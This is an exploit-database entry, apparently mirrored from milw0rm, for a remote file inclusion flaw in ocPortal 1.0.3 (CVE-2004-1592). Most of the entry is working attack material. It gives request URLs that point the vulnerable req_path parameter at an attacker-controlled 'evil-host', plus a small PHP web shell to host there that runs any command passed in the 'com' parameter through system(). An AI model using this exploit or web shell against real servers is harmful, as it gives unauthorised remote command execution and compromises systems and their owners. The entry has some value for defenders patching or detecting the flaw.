[] NeoSense
E X P L O I T S
title author type platform port cve id

ocPortal 1.0.3 - Remote File Inclusion

Author: Exoduks
type: webapps
platform: php
port: 
date_added: 2004-10-12 
date_updated:  
verified: 1 
codes: OSVDB-10712;CVE-2004-1592 
tags: 
aliases:  
screenshot_url:  
application_url: 
http://localhost/ocp-103/index.php?req_path=http ://evil-host/



On your evil host you must put scipt funcs.php.

Example of funcs.php if your host doesn't support php.



   <?php

     $com = $_GET["com"];

     system ("$com");

   ?>



  Example of funcs.php if your host support php.



   <?php

     echo '<?php $com = $_GET["com"]; system ("$com"); ?>';

   ?>



  http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls


# milw0rm.com [2004-10-13]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.